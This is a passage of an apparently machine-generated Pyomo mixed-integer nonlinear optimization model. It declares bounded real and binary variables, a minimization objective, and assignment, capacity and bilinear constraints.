m.x261 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x262 = Var(within=Reals,bounds=(0,0.18562706),initialize=0)
m.x263 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x264 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x265 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x266 = Var(within=Reals,bounds=(0,0.14212895),initialize=0)
m.x267 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x268 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x269 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x270 = Var(within=Reals,bounds=(0,0.17114392),initialize=0)
m.x271 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x272 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x273 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x274 = Var(within=Reals,bounds=(0,0.1603645),initialize=0)
m.x275 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x276 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x277 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x278 = Var(within=Reals,bounds=(0,0.18267189),initialize=0)
m.x279 = Var(within=Reals,bounds=(0,0.5323080366),initialize=0)
m.x280 = Var(within=Reals,bounds=(0,0.918715169866666),initialize=0)
m.x281 = Var(within=Reals,bounds=(0,1.021726146),initialize=0)
m.x282 = Var(within=Reals,bounds=(0,1.0706790744),initialize=0)
m.x283 = Var(within=Reals,bounds=(0,7.32543671346667),initialize=0)
m.x284 = Var(within=Reals,bounds=(0,15.2453990736),initialize=0)
m.x285 = Var(within=Reals,bounds=(0,1.28061192466667),initialize=0)
m.x286 = Var(within=Reals,bounds=(0,15.8815166933333),initialize=0)
m.x287 = Var(within=Reals,bounds=(0,15.2472806811333),initialize=0)
m.x288 = Var(within=Reals,bounds=(0,12.029055125),initialize=0)
m.x289 = Var(within=Reals,bounds=(0,15.9672360214667),initialize=0)
m.x290 = Var(within=Reals,bounds=(0,15.3736631157333),initialize=0)
m.x291 = Var(within=Reals,bounds=(0,6.2237284564),initialize=0)
m.x292 = Var(within=Reals,bounds=(0,8.85892556),initialize=0)
m.x293 = Var(within=Reals,bounds=(0,17.2437830768),initialize=0)
m.b294 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b295 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b296 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b297 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b298 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b299 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b300 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b301 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b302 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b303 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b304 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b305 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b306 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b307 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b308 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b309 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b310 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b311 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b312 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b313 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b314 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b315 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b316 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b317 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b318 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b319 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b320 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b321 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b322 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b323 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b324 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b325 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b326 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b327 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b328 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b329 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b330 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b331 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b332 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b333 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b334 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b335 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b336 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b337 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b338 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b339 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b340 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b341 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b342 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b343 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b344 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b345 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b346 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b347 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b348 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b349 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b350 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b351 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b352 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b353 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b354 = Var(within=Binary,bounds=(0,1),initialize=0)
m.b355 = Var(within=Binary,bounds=(0,1),initialize=0)
m.obj = Objective(expr= m.x136 + m.x137 + m.x138 + m.x139 + m.x140 + m.x141 + m.x142 + m.x143 + m.x144 + m.x145
+ m.x146 + m.x147 + m.x148 + m.x149 + m.x150, sense=minimize)
m.c2 = Constraint(expr=-(m.x121*m.x61*m.x1 + m.x121*m.x62*m.x2 + m.x121*m.x63*m.x3 + m.x121*m.x64*m.x4) + m.x279 == 0)
m.c3 = Constraint(expr=-(m.x122*m.x65*m.x5 + m.x122*m.x66*m.x6 + m.x122*m.x67*m.x7 + m.x122*m.x68*m.x8) + m.x280 == 0)
m.c4 = Constraint(expr=-(m.x123*m.x69*m.x9 + m.x123*m.x70*m.x10 + m.x123*m.x71*m.x11 + m.x123*m.x72*m.x12) + m.x281
== 0)
m.c5 = Constraint(expr=-(m.x124*m.x73*m.x13 + m.x124*m.x74*m.x14 + m.x124*m.x75*m.x15 + m.x124*m.x76*m.x16) + m.x282
== 0)
m.c6 = Constraint(expr=-(m.x125*m.x77*m.x17 + m.x125*m.x78*m.x18 + m.x125*m.x79*m.x19 + m.x125*m.x80*m.x20) + m.x283
== 0)
m.c7 = Constraint(expr=-(m.x126*m.x81*m.x21 + m.x126*m.x82*m.x22 + m.x126*m.x83*m.x23 + m.x126*m.x84*m.x24) + m.x284
== 0)
m.c8 = Constraint(expr=-(m.x127*m.x85*m.x25 + m.x127*m.x86*m.x26 + m.x127*m.x87*m.x27 + m.x127*m.x88*m.x28) + m.x285
== 0)
m.c9 = Constraint(expr=-(m.x128*m.x89*m.x29 + m.x128*m.x90*m.x30 + m.x128*m.x91*m.x31 + m.x128*m.x92*m.x32) + m.x286
== 0)
m.c10 = Constraint(expr=-(m.x129*m.x93*m.x33 + m.x129*m.x94*m.x34 + m.x129*m.x95*m.x35 + m.x129*m.x96*m.x36) + m.x287
== 0)
m.c11 = Constraint(expr=-(m.x130*m.x97*m.x37 + m.x130*m.x98*m.x38 + m.x130*m.x99*m.x39 + m.x130*m.x100*m.x40) + m.x288
== 0)
m.c12 = Constraint(expr=-(m.x131*m.x101*m.x41 + m.x131*m.x102*m.x42 + m.x131*m.x103*m.x43 + m.x131*m.x104*m.x44)
+ m.x289 == 0)
m.c13 = Constraint(expr=-(m.x132*m.x105*m.x45 + m.x132*m.x106*m.x46 + m.x132*m.x107*m.x47 + m.x132*m.x108*m.x48)
+ m.x290 == 0)
m.c14 = Constraint(expr=-(m.x133*m.x109*m.x49 + m.x133*m.x110*m.x50 + m.x133*m.x111*m.x51 + m.x133*m.x112*m.x52)
+ m.x291 == 0)
m.c15 = Constraint(expr=-(m.x134*m.x113*m.x53 + m.x134*m.x114*m.x54 + m.x134*m.x115*m.x55 + m.x134*m.x116*m.x56)
+ m.x292 == 0)
m.c16 = Constraint(expr=-(m.x135*m.x117*m.x57 + m.x135*m.x118*m.x58 + m.x135*m.x119*m.x59 + m.x135*m.x120*m.x60)
+ m.x293 == 0)
m.c17 = Constraint(expr= m.x1 + m.x2 + m.x3 + m.x4 == 1)
m.c18 = Constraint(expr= m.x5 + m.x6 + m.x7 + m.x8 == 1)
m.c19 = Constraint(expr= m.x9 + m.x10 + m.x11 + m.x12 == 1)
m.c20 = Constraint(expr= m.x13 + m.x14 + m.x15 + m.x16 == 1)
m.c21 = Constraint(expr= m.x17 + m.x18 + m.x19 + m.x20 == 1)
m.c22 = Constraint(expr= m.x21 + m.x22 + m.x23 + m.x24 == 1)
m.c23 = Constraint(expr= m.x25 + m.x26 + m.x27 + m.x28 == 1)
m.c24 = Constraint(expr= m.x29 + m.x30 + m.x31 + m.x32 == 1)
m.c25 = Constraint(expr= m.x33 + m.x34 + m.x35 + m.x36 == 1)
m.c26 = Constraint(expr= m.x37 + m.x38 + m.x39 + m.x40 == 1)
m.c27 = Constraint(expr= m.x41 + m.x42 + m.x43 + m.x44 == 1)
m.c28 = Constraint(expr= m.x45 + m.x46 + m.x47 + m.x48 == 1)
m.c29 = Constraint(expr= m.x49 + m.x50 + m.x51 + m.x52 == 1)
m.c30 = Constraint(expr= m.x53 + m.x54 + m.x55 + m.x56 == 1)
m.c31 = Constraint(expr= m.x57 + m.x58 + m.x59 + m.x60 == 1)
m.c32 = Constraint(expr= 2.02*m.x1 + 4.01333333333333*m.x5 + 4.76*m.x9 + 5.96*m.x13 + 42.0933333333333*m.x17
+ 99.28*m.x21 + 6.59333333333333*m.x25 + 61.8666666666667*m.x29 + 56.2866666666667*m.x33
+ 41.5*m.x37 + 62.4933333333333*m.x41 + 80.9066666666667*m.x45 + 26.1466666666667*m.x49
+ 38*m.x53 + 62.24*m.x57 <= 153.54)
m.c33 = Constraint(expr= 2.02*m.x2 + 4.01333333333333*m.x6 + 4.76*m.x10 + 5.96*m.x14 + 42.0933333333333*m.x18
+ 99.28*m.x22 + 6.59333333333333*m.x26 + 61.8666666666667*m.x30 + 56.2866666666667*m.x34
+ 41.5*m.x38 + 62.4933333333333*m.x42 + 80.9066666666667*m.x46 + 26.1466666666667*m.x50
+ 38*m.x54 + 62.24*m.x58 <= 153.54)
m.c34 = Constraint(expr= 2.02*m.x3 + 4.01333333333333*m.x7 + 4.76*m.x11 + 5.96*m.x15 + 42.0933333333333*m.x19
+ 99.28*m.x23 + 6.59333333333333*m.x27 + 61.8666666666667*m.x31 + 56.2866666666667*m.x35
+ 41.5*m.x39 + 62.4933333333333*m.x43 + 80.9066666666667*m.x47 + 26.1466666666667*m.x51
+ 38*m.x55 + 62.24*m.x59 <= 153.54)
m.c35 = Constraint(expr= 2.02*m.x4 + 4.01333333333333*m.x8 + 4.76*m.x12 + 5.96*m.x16 + 42.0933333333333*m.x20
+ 99.28*m.x24 + 6.59333333333333*m.x28 + 61.8666666666667*m.x32 + 56.2866666666667*m.x36
+ 41.5*m.x40 + 62.4933333333333*m.x44 + 80.9066666666667*m.x48 + 26.1466666666667*m.x52
+ 38*m.x56 + 62.24*m.x60 <= 153.54)
m.c36 = Constraint(expr= m.x151 + m.x159 >= 0.29424122)
m.c37 = Constraint(expr= m.x152 + m.x160 >= 0.29424122)
m.c38 = Constraint(expr= m.x153 + m.x161 >= 0.29424122)
m.c39 = Constraint(expr= m.x154 + m.x162 >= 0.29424122)
m.c40 = Constraint(expr= m.x151 + m.x163 >= 0.29760193)
m.c41 = Constraint(expr= m.x152 + m.x164 >= 0.29760193)
m.c42 = Constraint(expr= m.x153 + m.x165 >= 0.29760193)
m.c43 = Constraint(expr= m.x154 + m.x166 >= 0.29760193)
m.c44 = Constraint(expr= m.x151 + m.x167 >= 0.35149534)
m.c45 = Constraint(expr= m.x152 + m.x168 >= 0.35149534)
m.c46 = Constraint(expr= m.x153 + m.x169 >= 0.35149534)
m.c47 = Constraint(expr= m.x154 + m.x170 >= 0.35149534)
m.c48 = Constraint(expr= m.x151 + m.x171 >= 0.30458283)
m.c49 = Constraint(expr= m.x152 + m.x172 >= 0.30458283)
m.c50 = Constraint(expr= m.x153 + m.x173 >= 0.30458283)
m.c51 = Constraint(expr= m.x154 + m.x174 >= 0.30458283)
m.c52 = Constraint(expr= m.x151 + m.x175 >= 0.29951066)
m.c53 = Constraint(expr= m.x152 + m.x176 >= 0.29951066)
m.c54 = Constraint(expr= m.x153 + m.x177 >= 0.29951066)
m.c55 = Constraint(expr= m.x154 + m.x178 >= 0.29951066)
m.c56 = Constraint(expr= m.x151 + m.x179 >= 0.30694357)
m.c57 = Constraint(expr= m.x152 + m.x180 >= 0.30694357)
m.c58 = Constraint(expr= m.x153 + m.x181 >= 0.30694357)
m.c59 = Constraint(expr= m.x154 + m.x182 >= 0.30694357)
m.c60 = Constraint(expr= m.x151 + m.x183 >= 0.33520661)
m.c61 = Constraint(expr= m.x152 + m.x184 >= 0.33520661)
m.c62 = Constraint(expr= m.x153 + m.x185 >= 0.33520661)
m.c63 = Constraint(expr= m.x154 + m.x186 >= 0.33520661)
m.c64 = Constraint(expr= m.x151 + m.x187 >= 0.3400071)
m.c65 = Constraint(expr= m.x152 + m.x188 >= 0.3400071)
m.c66 = Constraint(expr= m.x153 + m.x189 >= 0.3400071)
m.c67 = Constraint(expr= m.x154 + m.x190 >= 0.3400071)
m.c68 = Constraint(expr= m.x151 + m.x191 >= 0.35227087)
m.c69 = Constraint(expr= m.x152 + m.x192 >= 0.35227087)
m.c70 = Constraint(expr= m.x153 + m.x193 >= 0.35227087)
m.c71 = Constraint(expr= m.x154 + m.x194 >= 0.35227087)
m.c72 = Constraint(expr= m.x151 + m.x195 >= 0.34225726)
m.c73 = Constraint(expr= m.x152 + m.x196 >= 0.34225726)
m.c74 = Constraint(expr= m.x153 + m.x197 >= 0.34225726)
m.c75 = Constraint(expr= m.x154 + m.x198 >= 0.34225726)
m.c76 = Constraint(expr= m.x151 + m.x199 >= 0.32776566)
m.c77 = Constraint(expr= m.x152 + m.x200 >= 0.32776566)
m.c78 = Constraint(expr= m.x153 + m.x201 >= 0.32776566)
m.c79 = Constraint(expr= m.x154 + m.x202 >= 0.32776566)
m.c80 = Constraint(expr= m.x151 + m.x203 >= 0.30438256)
m.c81 = Constraint(expr= m.x152 + m.x204 >= 0.30438256)
m.c82 = Constraint(expr= m.x153 + m.x205 >= 0.30438256)
m.c83 = Constraint(expr= m.x154 + m.x206 >= 0.30438256)
m.c84 = Constraint(expr= m.x151 + m.x207 >= 0.28538336)
m.c85 = Constraint(expr= m.x152 + m.x208 >= 0.28538336)
m.c86 = Constraint(expr= m.x153 + m.x209 >= 0.28538336)
m.c87 = Constraint(expr= m.x154 + m.x210 >= 0.28538336)
m.c88 = Constraint(expr= m.x151 + m.x211 >= 0.27950575)
m.c89 = Constraint(expr= m.x152 + m.x212 >= 0.27950575)
m.c90 = Constraint(expr= m.x153 + m.x213 >= 0.27950575)
m.c91 = Constraint(expr= m.x154 + m.x214 >= 0.27950575)
m.c92 = Constraint(expr= - m.x151 + m.x159 >= -0.29424122)
m.c93 = Constraint(expr= - m.x152 + m.x160 >= -0.29424122)
m.c94 = Constraint(expr= - m.x153 + m.x161 >= -0.29424122)
m.c95 = Constraint(expr= - m.x154 + m.x162 >= -0.29424122)
m.c96 = Constraint(expr= - m.x151 + m.x163 >= -0.29760193)
m.c97 = Constraint(expr= - m.x152 + m.x164 >= -0.29760193)
m.c98 = Constraint(expr= - m.x153 + m.x165 >= -0.29760193)
m.c99 = Constraint(expr= - m.x154 + m.x166 >= -0.29760193)
m.c100 = Constraint(expr= - m.x151 + m.x167 >= -0.35149534)
m.c101 = Constraint(expr= - m.x152 + m.x168 >= -0.35149534)
m.c102 = Constraint(expr= - m.x153 + m.x169 >= -0.35149534)
m.c103 = Constraint(expr= - m.x154 + m.x170 >= -0.35149534)
m.c104 = Constraint(expr= - m.x151 + m.x171 >= -0.30458283)
m.c105 = Constraint(expr= - m.x152 + m.x172 >= -0.30458283)
m.c106 = Constraint(expr= - m.x153 + m.x173 >= -0.30458283)
m.c107 = Constraint(expr= - m.x154 + m.x174 >= -0.30458283)
m.c108 = Constraint(expr= - m.x151 + m.x175 >= -0.29951066)
m.c109 = Constraint(expr= - m.x152 + m.x176 >= -0.29951066)
m.c110 = Constraint(expr= - m.x153 + m.x177 >= -0.29951066)
m.c111 = Constraint(expr= - m.x154 + m.x178 >= -0.29951066)
m.c112 = Constraint(expr= - m.x151 + m.x179 >= -0.30694357)
m.c113 = Constraint(expr= - m.x152 + m.x180 >= -0.30694357)
m.c114 = Constraint(expr= - m.x153 + m.x181 >= -0.30694357)
m.c115 = Constraint(expr= - m.x154 + m.x182 >= -0.30694357)
m.c116 = Constraint(expr= - m.x151 + m.x183 >= -0.33520661)
m.c117 = Constraint(expr= - m.x152 + m.x184 >= -0.33520661)
m.c118 = Constraint(expr= - m.x153 + m.x185 >= -0.33520661)
m.c119 = Constraint(expr= - m.x154 + m.x186 >= -0.33520661)
m.c120 = Constraint(expr= - m.x151 + m.x187 >= -0.3400071)
m.c121 = Constraint(expr= - m.x152 + m.x188 >= -0.3400071)
m.c122 = Constraint(expr= - m.x153 + m.x189 >= -0.3400071)
m.c123 = Constraint(expr= - m.x154 + m.x190 >= -0.3400071)
m.c124 = Constraint(expr= - m.x151 + m.x195 >= -0.34225726)
m.c125 = Constraint(expr= - m.x152 + m.x196 >= -0.34225726)
m.c126 = Constraint(expr= - m.x153 + m.x197 >= -0.34225726)
m.c127 = Constraint(expr= - m.x154 + m.x198 >= -0.34225726)
m.c128 = Constraint(expr= - m.x151 + m.x199 >= -0.32776566)
m.c129 = Constraint(expr= - m.x152 + m.x200 >= -0.32776566)
m.c130 = Constraint(expr= - m.x153 + m.x201 >= -0.32776566)
m.c131 = Constraint(expr= - m.x154 + m.x202 >= -0.32776566)
m.c132 = Constraint(expr= - m.x151 + m.x203 >= -0.30438256)
m.c133 = Constraint(expr= - m.x152 + m.x204 >= -0.30438256)
m.c134 = Constraint(expr= - m.x153 + m.x205 >= -0.30438256)
m.c135 = Constraint(expr= - m.x154 + m.x206 >= -0.30438256)
m.c136 = Constraint(expr= - m.x151 + m.x207 >= -0.28538336)
m.c137 = Constraint(expr= - m.x152 + m.x208 >= -0.28538336)
m.c138 = Constraint(expr= - m.x153 + m.x209 >= -0.28538336)
m.c139 = Constraint(expr= - m.x154 + m.x210 >= -0.28538336)
m.c140 = Constraint(expr= - m.x151 + m.x211 >= -0.27950575)
m.c141 = Constraint(expr= - m.x152 + m.x212 >= -0.27950575)
m.c142 = Constraint(expr= - m.x153 + m.x213 >= -0.27950575)
m.c143 = Constraint(expr= - m.x154 + m.x214 >= -0.27950575)
m.c144 = Constraint(expr= - m.x151 + m.x215 >= -0.25788969)
m.c145 = Constraint(expr= - m.x152 + m.x216 >= -0.25788969)
m.c146 = Constraint(expr= - m.x153 + m.x217 >= -0.25788969)
m.c147 = Constraint(expr= - m.x154 + m.x218 >= -0.25788969)
m.c148 = Constraint(expr= m.x155 + m.x223 >= -0.9536939)
m.c149 = Constraint(expr= m.x156 + m.x224 >= -0.9536939)
m.c150 = Constraint(expr= m.x157 + m.x225 >= -0.9536939)
m.c151 = Constraint(expr= m.x158 + m.x226 >= -0.9536939)
m.c152 = Constraint(expr= m.x155 + m.x227 >= -0.9004898)
m.c153 = Constraint(expr= m.x156 + m.x228 >= -0.9004898)
m.c154 = Constraint(expr= m.x157 + m.x229 >= -0.9004898)
m.c155 = Constraint(expr= m.x158 + m.x230 >= -0.9004898)
m.c156 = Constraint(expr= m.x155 + m.x231 >= -0.9114032)
m.c157 = Constraint(expr= m.x156 + m.x232 >= -0.9114032)
m.c158 = Constraint(expr= m.x157 + m.x233 >= -0.9114032)
m.c159 = Constraint(expr= m.x158 + m.x234 >= -0.9114032)
m.c160 = Constraint(expr= m.x155 + m.x235 >= -0.90071532)
m.c161 = Constraint(expr= m.x156 + m.x236 >= -0.90071532)
m.c162 = Constraint(expr= m.x157 + m.x237 >= -0.90071532)
m.c163 = Constraint(expr= m.x158 + m.x238 >= -0.90071532)
m.c164 = Constraint(expr= m.x155 + m.x239 >= -0.88043054)
m.c165 = Constraint(expr= m.x156 + m.x240 >= -0.88043054)
m.c166 = Constraint(expr= m.x157 + m.x241 >= -0.88043054)
m.c167 = Constraint(expr= m.x158 + m.x242 >= -0.88043054)
m.c168 = Constraint(expr= m.x155 + m.x243 >= -0.8680249)
m.c169 = Constraint(expr= m.x156 + m.x244 >= -0.8680249)
m.c170 = Constraint(expr= m.x157 + m.x245 >= -0.8680249)
m.c171 = Constraint(expr= m.x158 + m.x246 >= -0.8680249)
m.c172 = Constraint(expr= m.x155 + m.x247 >= -0.81034814)
m.c173 = Constraint(expr= m.x156 + m.x248 >= -0.81034814)
m.c174 = Constraint(expr= m.x157 + m.x249 >= -0.81034814)
m.c175 = Constraint(expr= m.x158 + m.x250 >= -0.81034814)
m.c176 = Constraint(expr= m.x155 + m.x251 >= -0.80843127)
m.c177 = Constraint(expr= m.x156 + m.x252 >= -0.80843127)
m.c178 = Constraint(expr= m.x157 + m.x253 >= -0.80843127)
m.c179 = Constraint(expr= m.x158 + m.x254 >= -0.80843127)
m.c180 = Constraint(expr= m.x155 + m.x255 >= -0.7794471)
m.c181 = Constraint(expr= m.x156 + m.x256 >= -0.7794471)
m.c182 = Constraint(expr= m.x157 + m.x257 >= -0.7794471)
m.c183 = Constraint(expr= m.x158 + m.x258 >= -0.7794471)
m.c184 = Constraint(expr= m.x155 + m.x259 >= -0.79930922)
m.c185 = Constraint(expr= m.x156 + m.x260 >= -0.79930922)
m.c186 = Constraint(expr= m.x157 + m.x261 >= -0.79930922)
m.c187 = Constraint(expr= m.x158 + m.x262 >= -0.79930922)
m.c188 = Constraint(expr= m.x155 + m.x263 >= -0.84280733)
m.c189 = Constraint(expr= m.x156 + m.x264 >= -0.84280733)
m.c190 = Constraint(expr= m.x157 + m.x265 >= -0.84280733)
m.c191 = Constraint(expr= m.x158 + m.x266 >= -0.84280733)
m.c192 = Constraint(expr= m.x155 + m.x267 >= -0.81379236)
m.c193 = Constraint(expr= m.x156 + m.x268 >= -0.81379236)
m.c194 = Constraint(expr= m.x157 + m.x269 >= -0.81379236)
m.c195 = Constraint(expr= m.x158 + m.x270 >= -0.81379236)
m.c196 = Constraint(expr= m.x155 + m.x271 >= -0.82457178)
m.c197 = Constraint(expr= m.x156 + m.x272 >= -0.82457178)
m.c198 = Constraint(expr= m.x157 + m.x273 >= -0.82457178)
m.c199 = Constraint(expr= m.x158 + m.x274 >= -0.82457178)
m.c200 = Constraint(expr= m.x155 + m.x275 >= -0.80226439)
m.c201 = Constraint(expr= m.x156 + m.x276 >= -0.80226439)
m.c202 = Constraint(expr= m.x157 + m.x277 >= -0.80226439)
m.c203 = Constraint(expr= m.x158 + m.x278 >= -0.80226439)
m.c204 = Constraint(expr= - m.x155 + m.x219 >= 0.98493628)
m.c205 = Constraint(expr= - m.x156 + m.x220 >= 0.98493628)
m.c206 = Constraint(expr= - m.x157 + m.x221 >= 0.98493628)
m.c207 = Constraint(expr= - m.x158 + m.x222 >= 0.98493628)
m.c208 = Constraint(expr= - m.x155 + m.x223 >= 0.9536939)
m.c209 = Constraint(expr= - m.x156 + m.x224 >= 0.9536939)
m.c210 = Constraint(expr= - m.x157 + m.x225 >= 0.9536939)
m.c211 = Constraint(expr= - m.x158 + m.x226 >= 0.9536939)
m.c212 = Constraint(expr= - m.x155 + m.x227 >= 0.9004898)
m.c213 = Constraint(expr= - m.x156 + m.x228 >= 0.9004898)
m.c214 = Constraint(expr= - m.x157 + m.x229 >= 0.9004898)
m.c215 = Constraint(expr= - m.x158 + m.x230 >= 0.9004898)
m.c216 = Constraint(expr= - m.x155 + m.x231 >= 0.9114032)
m.c217 = Constraint(expr= - m.x156 + m.x232 >= 0.9114032)
m.c218 = Constraint(expr= - m.x157 + m.x233 >= 0.9114032)
m.c219 = Constraint(expr= - m.x158 + m.x234 >= 0.9114032)
m.c220 = Constraint(expr= - m.x155 + m.x235 >= 0.90071532)
m.c221 = Constraint(expr= - m.x156 + m.x236 >= 0.90071532)
m.c222 = Constraint(expr= - m.x157 + m.x237 >= 0.90071532)
m.c223 = Constraint(expr= - m.x158 + m.x238 >= 0.90071532)
m.c224 = Constraint(expr= - m.x155 + m.x239 >= 0.88043054)
m.c225 = Constraint(expr= - m.x156 + m.x240 >= 0.88043054)
m.c226 = Constraint(expr= - m.x157 + m.x241 >= 0.88043054)
m.c227 = Constraint(expr= - m.x158 + m.x242 >= 0.88043054)
m.c228 = Constraint(expr= - m.x155 + m.x243 >= 0.8680249)
m.c229 = Constraint(expr= - m.x156 + m.x244 >= 0.8680249)
m.c230 = Constraint(expr= - m.x157 + m.x245 >= 0.8680249)
m.c231 = Constraint(expr= - m.x158 + m.x246 >= 0.8680249)
m.c232 = Constraint(expr= - m.x155 + m.x247 >= 0.81034814)
m.c233 = Constraint(expr= - m.x156 + m.x248 >= 0.81034814)
m.c234 = Constraint(expr= - m.x157 + m.x249 >= 0.81034814)
m.c235 = Constraint(expr= - m.x158 + m.x250 >= 0.81034814)
m.c236 = Constraint(expr= - m.x155 + m.x251 >= 0.80843127)
m.c237 = Constraint(expr= - m.x156 + m.x252 >= 0.80843127)
m.c238 = Constraint(expr= - m.x157 + m.x253 >= 0.80843127)
m.c239 = Constraint(expr= - m.x158 + m.x254 >= 0.80843127)
m.c240 = Constraint(expr= - m.x155 + m.x259 >= 0.79930922)
m.c241 = Constraint(expr= - m.x156 + m.x260 >= 0.79930922)
m.c242 = Constraint(expr= - m.x157 + m.x261 >= 0.79930922)
m.c243 = Constraint(expr= - m.x158 + m.x262 >= 0.79930922)
m.c244 = Constraint(expr= - m.x155 + m.x263 >= 0.84280733)
m.c245 = Constraint(expr= - m.x156 + m.x264 >= 0.84280733)
m.c246 = Constraint(expr= - m.x157 + m.x265 >= 0.84280733)
m.c247 = Constraint(expr= - m.x158 + m.x266 >= 0.84280733)
m.c248 = Constraint(expr= - m.x155 + m.x267 >= 0.81379236)
m.c249 = Constraint(expr= - m.x156 + m.x268 >= 0.81379236)
m.c250 = Constraint(expr= - m.x157 + m.x269 >= 0.81379236)
m.c251 = Constraint(expr= - m.x158 + m.x270 >= 0.81379236)
m.c252 = Constraint(expr= - m.x155 + m.x271 >= 0.82457178)
m.c253 = Constraint(expr= - m.x156 + m.x272 >= 0.82457178)
m.c254 = Constraint(expr= - m.x157 + m.x273 >= 0.82457178)
m.c255 = Constraint(expr= - m.x158 + m.x274 >= 0.82457178)
m.c256 = Constraint(expr= - m.x155 + m.x275 >= 0.80226439)
m.c257 = Constraint(expr= - m.x156 + m.x276 >= 0.80226439)
m.c258 = Constraint(expr= - m.x157 + m.x277 >= 0.80226439)
m.c259 = Constraint(expr= - m.x158 + m.x278 >= 0.80226439)
m.c260 = Constraint(expr= m.x61 - m.x159 - m.x219 == 0)
m.c261 = Constraint(expr= m.x62 - m.x160 - m.x220 == 0)
m.c262 = Constraint(expr= m.x63 - m.x161 - m.x221 == 0)
m.c263 = Constraint(expr= m.x64 - m.x162 - m.x222 == 0)
m.c264 = Constraint(expr= m.x65 - m.x163 - m.x223 == 0)
m.c265 = Constraint(expr= m.x66 - m.x164 - m.x224 == 0)
m.c266 = Constraint(expr= m.x67 - m.x165 - m.x225 == 0)
m.c267 = Constraint(expr= m.x68 - m.x166 - m.x226 == 0)
m.c268 = Constraint(expr= m.x69 - m.x167 - m.x227 == 0)
m.c269 = Constraint(expr= m.x70 - m.x168 - m.x228 == 0)
m.c270 = Constraint(expr= m.x71 - m.x169 - m.x229 == 0)
m.c271 = Constraint(expr= m.x72 - m.x170 - m.x230 == 0)
m.c272 = Constraint(expr= m.x73 - m.x171 - m.x231 == 0)
m.c273 = Constraint(expr= m.x74 - m.x172 - m.x232 == 0)
m.c274 = Constraint(expr= m.x75 - m.x173 - m.x233 == 0)
m.c275 = Constraint(expr= m.x76 - m.x174 - m.x234 == 0)
m.c276 = Constraint(expr= m.x77 - m.x175 - m.x235 == 0)
m.c277 = Constraint(expr= m.x78 - m.x176 - m.x236 == 0)
m.c278 = Constraint(expr= m.x79 - m.x177 - m.x237 == 0)
m.c279 = Constraint(expr= m.x80 - m.x178 - m.x238 == 0)
m.c280 = Constraint(expr= m.x81 - m.x179 - m.x239 == 0)
m.c281 = Constraint(expr= m.x82 - m.x180 - m.x240 == 0)
m.c282 = Constraint(expr= m.x83 - m.x181 - m.x241 == 0)
m.c283 = Constraint(expr= m.x84 - m.x182 - m.x242 == 0)
m.c284 = Constraint(expr= m.x85 - m.x183 - m.x243 == 0)
m.c285 = Constraint(expr= m.x86 - m.x184 - m.x244 == 0)
m.c286 = Constraint(expr= m.x87 - m.x185 - m.x245 == 0)
